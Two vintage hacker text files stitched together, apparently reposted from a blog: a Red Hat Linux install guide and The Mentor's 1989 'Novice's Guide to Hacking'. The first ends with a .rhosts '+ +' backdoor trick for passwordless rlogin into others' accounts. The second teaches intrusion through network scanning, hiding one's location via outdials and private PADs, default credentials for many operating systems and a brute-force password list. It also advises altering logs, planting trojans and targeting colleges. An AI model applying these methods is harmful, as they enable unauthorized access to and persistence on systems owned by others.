Now after you have assighned a native linux partition and labeled it / Then
you need to assighn swap space, assighn as much as you see fit mine is about
55 megs. It is also a good idea to label your dos partition i label mine
/dos this is so i can access files in my dos partition while using linux.
Once that is done click on OK and save the partition tables, when you get to
the place where you choose what to install. If you have a partition thats
more than 600 MB then choose the install everything option at the bottom of
the list, if your partition is below 600 MB, then choose everything on the
list except the install everything option. If by some chance you just want
a very basic setup, this is what i used to run, just choose x-windows, DNS
Nameserver, Dial-UP workstation,c++ development, and c development. This
will give you everything youneed to compile programs in ,linux, connect to
your ISP, run x-windows etc....
X-Windows is a graphical interface for linux it's very very nice
it's kinda like windows 95 but it dosn't suck as much, by the way I will be
refeering to windows 95 as winblows, for obvious reasons :-).
Once everything is installed, it will tr to sonfigure x-windows for
you, this is where it actually helps if you know every little chip in your
system, if you don't well tehn just guess, but whatever you do don't install
Metro-X, just install XFree86 x-server it's better, well after all that shit
you will need to install LILO, LILO is a boot manager it allows you to boot
into dos, linux and whatever other O/S's you may have lying around in yuor
system, once all that is set up, you will be asked if you wish to install a
printer or not, figure that part out yourself, it's pretty straight forward,
so I'm not gonna waste my time. I wouldn't recommend configuring a LAN
unless you know your shit about linux.
So once setup is finished , your system will reboot. WOA you just
installed linux and you're still alive it's amazing isn't it. So now you
should be faced with a prompt that says LILO Boot:
you can now press tab for options this will show which operating systems you
can boot into. You should ahve the following two choices dos and linux, now
since this text file covers linux you would want to boot into linux so at
the LILO prompt type in linux or simply press return, since linux is your
default operating system. Now you should see a bunch of services starting,
this indicates that linux is loading.
When you reach the login prompt type in root and use the password
you specefied for the setup program earlier. Finally you have redhat linux
installed on your system, and hopefully you're still alive, you're still
with me RIGHT!!!!! O.K so you have logged in as root, first thing you want
to do us shadow your password file I always do thsi because then at least i
know a little clueless newbie could never get in my system, to do this type
in pwconv. Well thats all you have to do, to me it's a shock that there are
so many unshadowed systems on the net when it's so easy to shadow the
password file, but i guess ignorance is the satan of all god's people. Well
i guess you're like dying to show your friends how k-rad and elite you are,
so I guess well better geton to setting up linux to use the net, in other
words to dial out to your ISP. O.K heres how you do it. When you're at the
prompt type in startx this will start up x-windows. Once x-windows is
started, you should see an interface much like windows 95, to the left
should be a box named control panel, in the center you should see a window
named local-host, this is simply the rootshell just like the one you get
when you login. Now to get the modem set up, in the control panel there
should be a lot of small icons, goto the 6th one down (modem configuration)
choose what com port your modem is on, if you dont know choose SOM 1 it
seems to be the default in most computers in gateways i do believe it's
COM 2, once thats done, goto the 5th icon down in the control panel
(network configuration)and click it, now choose interfaces then goto add,
choose ppp as your interface type. Put in your ISP's phone number, and
your login and password. Then choose customize, click on networking and
click on activate interface at boot time, once this is done goto done and
choose to save the configuration. Well thats it simply reboot by typing in
reboot and listen to your sweet modem's music.
Now that you're connected to your ISP let's go do some surfing, once
you're in x-windows, goto start/applications and click on Netscape Navigator.
Visit http://www.rootshell.com and run a search for scan, once you're
confronted with the search results, go down and find the file named
xenolith.tgz download that file. This is a neat little scanner that scans
sites for volunerabilities, and I'm basiacly gonna give you a lesson in
uncompressing files in linux. Once the file is downloaded goto the dir in
which it resides. Since it's a .tgz file we would uncompress it using the
following method. Type in gunzip -d xenolith.tgz this will give you
xenolith.tar then type in gzip xenolith.tgz this gives you xenolith.tar.gz
then type in zcat xenolith.tar.gz | tar xvf - . This will give you a dir
called xenolith just cd xenolith and read the README files for installation
instructions. I just thought i would include something on uncompressing
files because many people ask me for help on the topic.
Well I'm getting to the place where I have to think about what i
want to put in this text file, well here's something I will include, a
section with some useful command, so here goes. To shutdown your computer
type in shutdown -h now (your message) to reboot simply type reboot. To
compile use gcc filename.c -o filename. To talk to a user type in write
username then on the next line write your message, if you don't want people
to send you messages type in mesg n. Well i sure hop this guide helped you
through getting linux installed if you want to read books on linux and
you're cheap like me goto http://www.mcp.com and sighn up for their personal
bookshelf, and get reading tons of books for free, it's a hackers dream and
all time paradise.
Now just as you thought it was over I'm gonna show you a few hacking
tricks from linux not really how to hack just some useful commands, so here
goes. To telnet to a site type in telnet www.victim.com ,to telnet toa
site on a specific port type in telnet www.victim.com portnumbe. Let's say
i wanted to telnet to port 25 i would type in telnet www.victim.com 25 .
To FTP to a machine type in ftp www.victim.com. To rlogin to a machine,
many of you proably dont know what the hell im talking about so let me
explain. If you place a file called .rhosts in someones home directory and
that file has two plusses like this + + in it you can use the rlogin command
to log into the system using that account without a password. Ring a bell
in your mind? filling with fresh ideas. I use this method whenever I geta
shell account, it assures me that if they by any chance change the passowrd
I can always rlogin into the system assuming that the account has a .rhosts
file in it and the file contains + + then you're in good shape. Assume the
username of the account is lamer. So inorder to rlogin into lamer's account
we would do the follwoing. Type in rlogin www.victim.com -l lamer . This
will telnet us directly into lamer's account where we can start rooting the
system.
Well my hand hurts from typing too much, so I'm gonna stop typing,
please if you have any questions, suggestions, or comments, e-mail them to
ameister@vol.com. Also i nee some suggestions on what to write text files
about so please e-mail me, it would be greatly appreciated. Me and some
friends are going to be making a magazine with lots of text files and other
interesting hacking material, if you would like a copy e-mail me for more
info, the price should be no mroe than $4 Shipping & Handling included.

DISCLAIMER:

This shit is for educational purposes only, I'm not responisble for any
trouble you get in using this info.

VISIT MY WEBPAGE FOR MY OTHER TEXT FILEZ AND USEFUL UTILITIES ETC...

HACKERSWEB IS BACK

http://www.vol.com/~ameister

hackbeg

2008-06-07T04:20:00.000-07:00

+++++++++++++++++++++++++++++++++++++++++++++++++
| The LOD/H Presents |
++++++++++++++++ ++++++++++++++++
\ A Novice's Guide to Hacking- 1989 edition /
\ ========================================= /
\ by /
\ The Mentor /
\ Legion of Doom/Legion of Hackers /
\ /
\ December, 1988 /
\ Merry Christmas Everyone! /
\+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/

**********************************************************************
| The author hereby grants permission to reproduce, redistribute, |
| or include this file in your g-file section, electronic or print |
| newletter, or any other form of transmission that you choose, as |
| long as it is kept intact and whole, with no ommissions, delet- |
| ions, or changes. (C) The Mentor- Phoenix Project Productions |
| 1988,1989 512/441-3088 |
**********************************************************************

Introduction: The State of the Hack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
After surveying a rather large g-file collection, my attention was drawn to
the fact that there hasn't been a good introductory file written for absolute
beginners since back when Mark Tabas was cranking them out (and almost
*everyone* was a beginner!) The Arts of Hacking and Phreaking have changed
radically since that time, and as the 90's approach, the hack/phreak community
has recovered from the Summer '87 busts (just like it recovered from the Fall
'85 busts, and like it will always recover from attempts to shut it down), and
the progressive media (from Reality Hackers magazine to William Gibson and
Bruce Sterling's cyberpunk fables of hackerdom) is starting to take notice
of us for the first time in recent years in a positive light.
Unfortunately, it has also gotten more dangerous since the early 80's.
Phone cops have more resources, more awareness, and more intelligence that they
exhibited in the past. It is becoming more and more difficult to survive as
a hacker long enough to become skilled in the art. To this end this file
is dedicated . If it can help someone get started, and help them survive
to discover new systems and new information, it will have served it's purpose,
and served as a partial repayment to all the people who helped me out when I
was a beginner.

Contents
~~~~~~~~
This file will be divided into four parts:
Part 1: What is Hacking, A Hacker's Code of Ethics, Basic Hacking Safety
Part 2: Packet Switching Networks: Telenet- How it Works, How to Use it,
Outdials, Network Servers, Private PADs
Part 3: Identifying a Computer, How to Hack In, Operating System
Defaults
Part 4: Conclusion- Final Thoughts, Books to Read, Boards to Call,
Acknowledgements

Part One: The Basics
~~~~~~~~~~~~~~~~~~~~
As long as there have been computers, there have been hackers. In the 50's
at the Massachusets Institute of Technology (MIT), students devoted much time
and energy to ingenious exploration of the computers. Rules and the law were
disregarded in their pursuit for the 'hack'. Just as they were enthralled with
their pursuit of information, so are we. The thrill of the hack is not in
breaking the law, it's in the pursuit and capture of knowledge.
To this end, let me contribute my suggestions for guidelines to follow to
ensure that not only you stay out of trouble, but you pursue your craft without
damaging the computers you hack into or the companies who own them.

I. Do not intentionally damage *any* system.
II. Do not alter any system files other than ones needed to ensure your
escape from detection and your future access (Trojan Horses, Altering
Logs, and the like are all necessary to your survival for as long as
possible.)
III. Do not leave your (or anyone else's) real name, real handle, or real
phone number on any system that you access illegally. They *can* and
will track you down from your handle!
IV. Be careful who you share information with. Feds are getting trickier.
Generally, if you don't know their voice phone number, name, and
occupation or haven't spoken with them voice on non-info trading
conversations, be wary.

V. Do not leave your real phone number to anyone you don't know. This
includes logging on boards, no matter how k-rad they seem. If you
don't know the sysop, leave a note telling some trustworthy people
that will validate you.
VI. Do not hack government computers. Yes, there are government systems
that are safe to hack, but they are few and far between. And the
government has inifitely more time and resources to track you down than
a company who has to make a profit and justify expenses.
VII. Don't use codes unless there is *NO* way around it (you don't have a
local telenet or tymnet outdial and can't connect to anything 800...)
You use codes long enough, you will get caught. Period.
VIII. Don't be afraid to be paranoid. Remember, you *are* breaking the law.
It doesn't hurt to store everything encrypted on your hard disk, or
keep your notes buried in the backyard or in the trunk of your car.
You may feel a little funny, but you'll feel a lot funnier when you
when you meet Bruno, your transvestite cellmate who axed his family to
death.
IX. Watch what you post on boards. Most of the really great hackers in the
country post *nothing* about the system they're currently working
except in the broadest sense (I'm working on a UNIX, or a COSMOS, or
something generic. Not "I'm hacking into General Electric's Voice Mail
System" or something inane and revealing like that.)
X. Don't be afraid to ask questions. That's what more experienced hackers
are for. Don't expect *everything* you ask to be answered, though.
There are some things (LMOS, for instance) that a begining hacker
shouldn't mess with. You'll either get caught, or screw it up for
others, or both.
XI. Finally, you have to actually hack. You can hang out on boards all you
want, and you can read all the text files in the world, but until you
actually start doing it, you'll never know what it's all about. There's
no thrill quite the same as getting into your first system (well, ok,
I can think of a couple of bigger thrills, but you get the picture.)

One of the safest places to start your hacking career is on a computer
system belonging to a college. University computers have notoriously lax
security, and are more used to hackers, as every college computer depart-
ment has one or two, so are less likely to press charges if you should
be detected. But the odds of them detecting you and having the personel to
committ to tracking you down are slim as long as you aren't destructive.
If you are already a college student, this is ideal, as you can legally
explore your computer system to your heart's desire, then go out and look
for similar systems that you can penetrate with confidence, as you're already
familar with them.
So if you just want to get your feet wet, call your local college. Many of
them will provide accounts for local residents at a nominal (under $20) charge.
Finally, if you get caught, stay quiet until you get a lawyer. Don't vol-
unteer any information, no matter what kind of 'deals' they offer you.
Nothing is binding unless you make the deal through your lawyer, so you might
as well shut up and wait.

Part Two: Networks
~~~~~~~~~~~~~~~~~~
The best place to begin hacking (other than a college) is on one of the
bigger networks such as Telenet. Why? First, there is a wide variety of
computers to choose from, from small Micro-Vaxen to huge Crays. Second, the
networks are fairly well documented. It's easier to find someone who can help
you with a problem off of Telenet than it is to find assistance concerning your
local college computer or high school machine. Third, the networks are safer.
Because of the enormous number of calls that are fielded every day by the big
networks, it is not financially practical to keep track of where every call and
connection are made from. It is also very easy to disguise your location using
the network, which makes your hobby much more secure.
Telenet has more computers hooked to it than any other system in the world
once you consider that from Telenet you have access to Tymnet, ItaPAC, JANET,
DATAPAC, SBDN, PandaNet, THEnet, and a whole host of other networks, all of
which you can connect to from your terminal.
The first step that you need to take is to identify your local dialup port.
This is done by dialing 1-800-424-9494 (1200 7E1) and connecting. It will
spout some garbage at you and then you'll get a prompt saying 'TERMINAL='.
This is your terminal type. If you have vt100 emulation, type it in now. Or
just hit return and it will default to dumb terminal mode.
You'll now get a prompt that looks like a @. From here, type @c mail
and then it will ask for a Username. Enter 'phones' for the username. When it
asks for a password, enter 'phones' again. From this point, it is menu
driven. Use this to locate your local dialup, and call it back locally. If
you don't have a local dialup, then use whatever means you wish to connect to
one long distance (more on this later.)
When you call your local dialup, you will once again go through the
TERMINAL= stuff, and once again you'll be presented with a @. This prompt lets
you know you are connected to a Telenet PAD. PAD stands for either Packet
Assembler/Disassembler (if you talk to an engineer), or Public Access Device
(if you talk to Telenet's marketing people.) The first description is more
correct.
Telenet works by taking the data you enter in on the PAD you dialed into,
bundling it into a 128 byte chunk (normally... this can be changed), and then
transmitting it at speeds ranging from 9600 to 19,200 baud to another PAD, who
then takes the data and hands it down to whatever computer or system it's
connected to. Basically, the PAD allows two computers that have different baud
rates or communication protocols to communicate with each other over a long
distance. Sometimes you'll notice a time lag in the remote machines response.
This is called PAD Delay, and is to be expected when you're sending data
through several different links.
What do you do with this PAD? You use it to connect to remote computer
systems by typing 'C' for connect and then the Network User Address (NUA) of
the system you want to go to.
An NUA takes the form of 031103130002520
\___/\___/\___/
| | |
| | |____ network address
| |_________ area prefix
|______________ DNIC

This is a summary of DNIC's (taken from Blade Runner's file on ItaPAC)
according to their country and network name.

DNIC Network Name Country DNIC Network Name Country
_______________________________________________________________________________
|
02041 Datanet 1 Netherlands | 03110 Telenet USA
02062 DCS Belgium | 03340 Telepac Mexico
02080 Transpac France | 03400 UDTS-Curacau Curacau
02284 Telepac Switzerland | 04251 Isranet Israel
02322 Datex-P Austria | 04401 DDX-P Japan
02329 Radaus Austria | 04408 Venus-P Japan
02342 PSS UK | 04501 Dacom-Net South Korea
02382 Datapak Denmark | 04542 Intelpak Singapore
02402 Datapak Sweden | 05052 Austpac Australia
02405 Telepak Sweden | 05053 Midas Australia
02442 Finpak Finland | 05252 Telepac Hong Kong
02624 Datex-P West Germany | 05301 Pacnet New Zealand
02704 Luxpac Luxembourg | 06550 Saponet South Africa
02724 Eirpak Ireland | 07240 Interdata Brazil
03020 Datapac Canada | 07241 Renpac Brazil
03028 Infogram Canada | 09000 Dialnet USA
03103 ITT/UDTS USA | 07421 Dompac French Guiana
03106 Tymnet USA |

There are two ways to find interesting addresses to connect to. The first
and easiest way is to obtain a copy of the LOD/H Telenet Directory from the
LOD/H Technical Journal #4 or 2600 Magazine. Jester Sluggo also put out a good
list of non-US addresses in Phrack Inc. Newsletter Issue 21. These files will
tell you the NUA, whether it will accept collect calls or not, what type of
computer system it is (if known) and who it belongs to (also if known.)
The second method of locating interesting addresses is to scan for them
manually. On Telenet, you do not have to enter the 03110 DNIC to connect to a
Telenet host. So if you saw that 031104120006140 had a VAX on it you wanted to
look at, you could type @c 412 614 (0's can be ignored most of the time.)
If this node allows collect billed connections, it will say 412 614
CONNECTED and then you'll possibly get an identifying header or just a
Username: prompt. If it doesn't allow collect connections, it will give you a
message such as 412 614 REFUSED COLLECT CONNECTION with some error codes out to
the right, and return you to the @ prompt.
There are two primary ways to get around the REFUSED COLLECT message. The
first is to use a Network User Id (NUI) to connect. An NUI is a username/pw
combination that acts like a charge account on Telenet. To collect to node
412 614 with NUI junk4248, password 525332, I'd type the following:
@c 412 614,junk4248,525332 <---- the 525332 will *not* be echoed to the
screen. The problem with NUI's is that they're hard to come by unless you're
a good social engineer with a thorough knowledge of Telenet (in which case
you probably aren't reading this section), or you have someone who can
provide you with them.
The second way to connect is to use a private PAD, either through an X.25
PAD or through something like Netlink off of a Prime computer (more on these
two below.)
The prefix in a Telenet NUA oftentimes (not always) refers to the phone Area
Code that the computer is located in (i.e. 713 xxx would be a computer in
Houston, Texas.) If there's a particular area you're interested in, (say,
New York City 914), you could begin by typing @c 914 001 . If it connects,
you make a note of it and go on to 914 002. You do this until you've found
some interesting systems to play with.
Not all systems are on a simple xxx yyy address. Some go out to four or
five digits (914 2354), and some have decimal or numeric extensions
(422 121A = 422 121.01). You have to play with them, and you never know what
you're going to find. To fully scan out a prefix would take ten million
attempts per prefix. For example, if I want to scan 512 completely, I'd have
to start with 512 00000.00 and go through 512 00000.99, then increment the
address by 1 and try 512 00001.00 through 512 00001.99. A lot of scanning.
There are plenty of neat computers to play with in a 3-digit scan, however,
so don't go berserk with the extensions.
Sometimes you'll attempt to connect and it will just be sitting there after
one or two minutes. In this case, you want to abort the connect attempt by
sending a hard break (this varies with different term programs, on Procomm,
it's ALT-B), and then when you get the @ prompt back, type 'D' for disconnect.
If you connect to a computer and wish to disconnect, you can type @
and you it should say TELENET and then give you the @ prompt. From there,
type D to disconnect or CONT to re-connect and continue your session
uninterrupted.

Outdials, Network Servers, and PADs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In addition to computers, an NUA may connect you to several other things.
One of the most useful is the outdial. An outdial is nothing more than a modem
you can get to over telenet- similar to the PC Pursuit concept, except that
these don't have passwords on them most of the time.
When you connect, you will get a message like 'Hayes 1200 baud outdial,
Detroit, MI', or 'VEN-TEL 212 Modem', or possibly 'Session 1234 established
on Modem 5588'. The best way to figure out the commands on these is to
type ? or H or HELP- this will get you all the information that you need to
use one.
Safety tip here- when you are hacking *any* system through a phone dialup,
always use an outdial or a diverter, especially if it is a local phone number
to you. More people get popped hacking on local computers than you can
imagine, Intra-LATA calls are the easiest things in the world to trace inexp-
ensively.
Another nice trick you can do with an outdial is use the redial or macro
function that many of them have. First thing you do when you connect is to
invoke the 'Redial Last Number' facility. This will dial the last number used,
which will be the one the person using it before you typed. Write down the
number, as no one would be calling a number without a computer on it. This
is a good way to find new systems to hack. Also, on a VENTEL modem, type 'D'
for Display and it will display the five numbers stored as macros in the
modem's memory.
There are also different types of servers for remote Local Area Networks
(LAN) that have many machine all over the office or the nation connected to
them. I'll discuss identifying these later in the computer ID section.
And finally, you may connect to something that says 'X.25 Communication
PAD' and then some more stuff, followed by a new @ prompt. This is a PAD
just like the one you are on, except that all attempted connections are billed
to the PAD, allowing you to connect to those nodes who earlier refused collect
connections.
This also has the added bonus of confusing where you are connecting from.
When a packet is transmitted from PAD to PAD, it contains a header that has
the location you're calling from. For instance, when you first connected
to Telenet, it might have said 212 44A CONNECTED if you called from the 212
area code. This means you were calling PAD number 44A in the 212 area.
That 21244A will be sent out in the header of all packets leaving the PAD.
Once you connect to a private PAD, however, all the packets going out
from *it* will have it's address on them, not yours. This can be a valuable
buffer between yourself and detection.

Phone Scanning
~~~~~~~~~~~~~~
Finally, there's the time-honored method of computer hunting that was made
famous among the non-hacker crowd by that Oh-So-Technically-Accurate movie
Wargames. You pick a three digit phone prefix in your area and dial every
number from 0000 --> 9999 in that prefix, making a note of all the carriers
you find. There is software available to do this for nearly every computer
in the world, so you don't have to do it by hand.

Part Three: I've Found a Computer, Now What?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This next section is applicable universally. It doesn't matter how you
found this computer, it could be through a network, or it could be from
carrier scanning your High School's phone prefix, you've got this prompt
this prompt, what the hell is it?
I'm *NOT* going to attempt to tell you what to do once you're inside of
any of these operating systems. Each one is worth several G-files in its
own right. I'm going to tell you how to identify and recognize certain
OpSystems, how to approach hacking into them, and how to deal with something
that you've never seen before and have know idea what it is.

VMS- The VAX computer is made by Digital Equipment Corporation (DEC),
and runs the VMS (Virtual Memory System) operating system.
VMS is characterized by the 'Username:' prompt. It will not tell
you if you've entered a valid username or not, and will disconnect
you after three bad login attempts. It also keeps track of all
failed login attempts and informs the owner of the account next time
s/he logs in how many bad login attempts were made on the account.
It is one of the most secure operating systems around from the
outside, but once you're in there are many things that you can do
to circumvent system security. The VAX also has the best set of
help files in the world. Just type HELP and read to your heart's
content.
Common Accounts/Defaults: [username: password [[,password]] ]
SYSTEM: OPERATOR or MANAGER or SYSTEM or SYSLIB
OPERATOR: OPERATOR
SYSTEST: UETP
SYSMAINT: SYSMAINT or SERVICE or DIGITAL
FIELD: FIELD or SERVICE
GUEST: GUEST or unpassworded
DEMO: DEMO or unpassworded
DECNET: DECNET

DEC-10- An earlier line of DEC computer equipment, running the TOPS-10
operating system. These machines are recognized by their
'.' prompt. The DEC-10/20 series are remarkably hacker-friendly,
allowing you to enter several important commands without ever
logging into the system. Accounts are in the format [xxx,yyy] where
xxx and yyy are integers. You can get a listing of the accounts and
the process names of everyone on the system before logging in with
the command .systat (for SYstem STATus). If you seen an account
that reads [234,1001] BOB JONES, it might be wise to try BOB or
JONES or both for a password on this account. To login, you type
.login xxx,yyy and then type the password when prompted for it.
The system will allow you unlimited tries at an account, and does
not keep records of bad login attempts. It will also inform you
if the UIC you're trying (UIC = User Identification Code, 1,2 for
example) is bad.
Common Accounts/Defaults:
1,2: SYSLIB or OPERATOR or MANAGER
2,7: MAINTAIN
5,30: GAMES

UNIX- There are dozens of different machines out there that run UNIX.
While some might argue it isn't the best operating system in the
world, it is certainly the most widely used. A UNIX system will
usually have a prompt like 'login:' in lower case. UNIX also
will give you unlimited shots at logging in (in most cases), and
there is usually no log kept of bad attempts.
Common Accounts/Defaults: (note that some systems are case
sensitive, so use lower case as a general rule. Also, many times
the accounts will be unpassworded, you'll just drop right in!)
root: root
admin: admin
sysadmin: sysadmin or admin
unix: unix
uucp: uucp
rje: rje
guest: guest
demo: demo
daemon: daemon
sysbin: sysbin

Prime- Prime computer company's mainframe running the Primos operating
system. The are easy to spot, as the greet you with
'Primecon 18.23.05' or the like, depending on the version of the
operating system you run into. There will usually be no prompt
offered, it will just look like it's sitting there. At this point,
type 'login '. If it is a pre-18.00.00 version of Primos,
you can hit a bunch of ^C's for the password and you'll drop in.
Unfortunately, most people are running versions 19+. Primos also
comes with a good set of help files. One of the most useful
features of a Prime on Telenet is a facility called NETLINK. Once
you're inside, type NETLINK and follow the help files. This allows
you to connect to NUA's all over the world using the 'nc' command.
For example, to connect to NUA 026245890040004, you would type
@nc :26245890040004 at the netlink prompt.
Common Accounts/Defaults:
PRIME PRIME or PRIMOS
PRIMOS_CS PRIME or PRIMOS
PRIMENET PRIMENET
SYSTEM SYSTEM or PRIME
NETLINK NETLINK
TEST TEST
GUEST GUEST
GUEST1 GUEST

HP-x000- This system is made by Hewlett-Packard. It is characterized by the
':' prompt. The HP has one of the more complicated login sequences
around- you type 'HELLO SESSION NAME,USERNAME,ACCOUNTNAME,GROUP'.
Fortunately, some of these fields can be left blank in many cases.
Since any and all of these fields can be passworded, this is not
the easiest system to get into, except for the fact that there are
usually some unpassworded accounts around. In general, if the
defaults don't work, you'll have to brute force it using the
common password list (see below.) The HP-x000 runs the MPE operat-
ing system, the prompt for it will be a ':', just like the logon
prompt.
Common Accounts/Defaults:
MGR.TELESUP,PUB User: MGR Acct: HPONLY Grp: PUB
MGR.HPOFFICE,PUB unpassworded
MANAGER.ITF3000,PUB unpassworded
FIELD.SUPPORT,PUB user: FLD, others unpassworded
MAIL.TELESUP,PUB user: MAIL, others
unpassworded
MGR.RJE unpassworded
FIELD.HPPl89 ,HPPl87,HPPl89,HPPl96 unpassworded
MGR.TELESUP,PUB,HPONLY,HP3 unpassworded

IRIS- IRIS stands for Interactive Real Time Information System. It orig-
inally ran on PDP-11's, but now runs on many other minis. You can
spot an IRIS by the 'Welcome to "IRIS" R9.1.4 Timesharing' banner,
and the ACCOUNT ID? prompt. IRIS allows unlimited tries at hacking
in, and keeps no logs of bad attempts. I don't know any default
passwords, so just try the common ones from the password database
below.
Common Accounts:
MANAGER
BOSS
SOFTWARE
DEMO
PDP8
PDP11
ACCOUNTING

VM/CMS- The VM/CMS operating system runs in International Business Machines
(IBM) mainframes. When you connect to one of these, you will get
message similar to 'VM/370 ONLINE', and then give you a '.' prompt,
just like TOPS-10 does. To login, you type 'LOGON '.
Common Accounts/Defaults are:
AUTOLOG1: AUTOLOG or AUTOLOG1
CMS: CMS
CMSBATCH: CMS or CMSBATCH
EREP: EREP
MAINT: MAINT or MAINTAIN
OPERATNS: OPERATNS or OPERATOR
OPERATOR: OPERATOR
RSCS: RSCS
SMART: SMART
SNA: SNA
VMTEST: VMTEST
VMUTIL: VMUTIL
VTAM: VTAM

NOS- NOS stands for Networking Operating System, and runs on the Cyber
computer made by Control Data Corporation. NOS identifies itself
quite readily, with a banner of 'WELCOME TO THE NOS SOFTWARE
SYSTEM. COPYRIGHT CONTROL DATA 1978,1987'. The first prompt you
will get will be FAMILY:. Just hit return here. Then you'll get
a USER NAME: prompt. Usernames are typically 7 alpha-numerics
characters long, and are *extremely* site dependent. Operator
accounts begin with a digit, such as 7ETPDOC.
Common Accounts/Defaults:
$SYSTEM unknown
SYSTEMV unknown

Decserver- This is not truly a computer system, but is a network server that
has many different machines available from it. A Decserver will
say 'Enter Username>' when you first connect. This can be anything,
it doesn't matter, it's just an identifier. Type 'c', as this is
the least conspicuous thing to enter. It will then present you
with a 'Local>' prompt. From here, you type 'c ' to
connect to a system. To get a list of system names, type
'sh services' or 'sh nodes'. If you have any problems, online
help is available with the 'help' command. Be sure and look for
services named 'MODEM' or 'DIAL' or something similar, these are
often outdial modems and can be useful!

GS/1- Another type of network server. Unlike a Decserver, you can't
predict what prompt a GS/1 gateway is going to give you. The
default prompt it 'GS/1>', but this is redifinable by the
system administrator. To test for a GS/1, do a 'sh d'. If that
prints out a large list of defaults (terminal speed, prompt,
parity, etc...), you are on a GS/1. You connect in the same manner
as a Decserver, typing 'c '. To find out what systems
are available, do a 'sh n' or a 'sh c'. Another trick is to do a
'sh m', which will sometimes show you a list of macros for logging
onto a system. If there is a macro named VAX, for instance, type
'do VAX'.

The above are the main system types in use today. There are
hundreds of minor variants on the above, but this should be
enough to get you started.

Unresponsive Systems
~~~~~~~~~~~~~~~~~~~~
Occasionally you will connect to a system that will do nothing but sit
there. This is a frustrating feeling, but a methodical approach to the system
will yield a response if you take your time. The following list will usually
make *something* happen.
1) Change your parity, data length, and stop bits. A system that won't re-
spond at 8N1 may react at 7E1 or 8E2 or 7S2. If you don't have a term
program that will let you set parity to EVEN, ODD, SPACE, MARK, and NONE,
with data length of 7 or 8, and 1 or 2 stop bits, go out and buy one.
While having a good term program isn't absolutely necessary, it sure is
helpful.
2) Change baud rates. Again, if your term program will let you choose odd
baud rates such as 600 or 1100, you will occasionally be able to penetrate
some very interesting systems, as most systems that depend on a strange
baud rate seem to think that this is all the security they need...
3) Send a series of 's.
4) Send a hard break followed by a .
5) Type a series of .'s (periods). The Canadian network Datapac responds
to this.
6) If you're getting garbage, hit an 'i'. Tymnet responds to this, as does
a MultiLink II.
7) Begin sending control characters, starting with ^A --> ^Z.
8) Change terminal emulations. What your vt100 emulation thinks is garbage
may all of a sudden become crystal clear using ADM-5 emulation. This also
relates to how good your term program is.
9) Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, LOGON, GO,
JOIN, HELP, and anything else you can think of.
10) If it's a dialin, call the numbers around it and see if a company
answers. If they do, try some social engineering.

Brute Force Hacking
~~~~~~~~~~~~~~~~~~~
There will also be many occasions when the default passwords will not work
on an account. At this point, you can either go onto the next system on your
list, or you can try to 'brute-force' your way in by trying a large database
of passwords on that one account. Be careful, though! This works fine on
systems that don't keep track of invalid logins, but on a system like a VMS,
someone is going to have a heart attack if they come back and see '600 Bad
Login Attempts Since Last Session' on their account. There are also some
operating systems that disconnect after 'x' number of invalid login attempts
and refuse to allow any more attempts for one hour, or ten minutes, or some-
times until the next day.
The following list is taken from my own password database plus the data-
base of passwords that was used in the Internet UNIX Worm that was running
around in November of 1988. For a shorter group, try first names, computer
terms, and obvious things like 'secret', 'password', 'open', and the name
of the account. Also try the name of the company that owns the computer
system (if known), the company initials, and things relating to the products
the company makes or deals with.

Password List
=============

aaa daniel jester rascal
academia danny johnny really
ada dave joseph rebecca
adrian deb joshua remote
aerobics debbie judith rick
airplane deborah juggle reagan
albany december julia robot
albatross desperate kathleen robotics
albert develop kermit rolex
alex diet kernel ronald
alexander digital knight rosebud
algebra discovery lambda rosemary
alias disney larry roses
alpha dog lazarus ruben
alphabet drought lee rules
ama duncan leroy ruth
amy easy lewis sal
analog eatme light saxon
anchor edges lisa scheme
andy edwin louis scott
andrea egghead lynne scotty
animal eileen mac secret
answer einstein macintosh sensor
anything elephant mack serenity
arrow elizabeth maggot sex
arthur ellen magic shark
asshole emerald malcolm sharon
athena engine mark shit
atmosphere engineer markus shiva
bacchus enterprise marty shuttle
badass enzyme marvin simon
bailey euclid master simple
banana evelyn maurice singer
bandit extension merlin single
banks fairway mets smile
bass felicia michael smiles
batman fender michelle smooch
beauty fermat mike smother
beaver finite minimum snatch
beethoven flower minsky snoopy
beloved foolproof mogul soap
benz football moose socrates
beowulf format mozart spit
berkeley forsythe nancy spring
berlin fourier napoleon subway
beta fred network success
beverly friend newton summer
bob frighten next super
brenda fun olivia support
brian gabriel oracle surfer
bridget garfield orca suzanne
broadway gauss orwell tangerine
bumbling george osiris tape
cardinal gertrude outlaw target
carmen gibson oxford taylor
carolina ginger pacific telephone
caroline gnu painless temptation
castle golf pam tiger
cat golfer paper toggle
celtics gorgeous password tomato
change graham pat toyota
charles gryphon patricia trivial
charming guest penguin unhappy
charon guitar pete unicorn
chester hacker peter unknown
cigar harmony philip urchin
classic harold phoenix utility
coffee harvey pierre vicky
coke heinlein pizza virginia
collins hello plover warren
comrade help polynomial water
computer herbert praise weenie
condo honey prelude whatnot
condom horse prince whitney
cookie imperial protect will
cooper include pumpkin william
create ingres puppet willie
creation innocuous rabbit winston
creator irishman rachmaninoff wizard
cretin isis rainbow wombat
daemon japan raindrop yosemite
dancer jessica random zap

Part Four: Wrapping it up!
~~~~~~~~~~~~~~~~~~~~~~~~~~
I hope this file has been of some help in getting started. If you're
asking yourself the question 'Why hack?', then you've probably wasted a lot
of time reading this, as you'll never understand. For those of you who
have read this and found it useful, please send a tax-deductible donation
of $5.00 (or more!) in the name of the Legion of Doom to:
The American Cancer Society
90 Park Avenue
New York, NY 10016

********************************************************************************
References:
1) Introduction to ItaPAC by Blade Runner
Telecom Security Bulletin #1
2) The IBM VM/CMS Operating System by Lex Luthor
The LOD/H Technical Journal #2
3) Hacking the IRIS Operating System by The Leftist
The LOD/H Technical Journal #3
4) Hacking CDC's Cyber by Phrozen Ghost
Phrack Inc. Newsletter #18
5) USENET comp.risks digest (various authors, various issues)
6) USENET unix.wizards forum (various authors)
7) USENET info-vax forum (various authors)

Recommended Reading:
1) Hackers by Steven Levy
2) Out of the Inner Circle by Bill Landreth
3) Turing's Man by J. David Bolter
4) Soul of a New Machine by Tracy Kidder
5) Neuromancer, Count Zero, Mona Lisa Overdrive, and Burning Chrome, all
by William Gibson
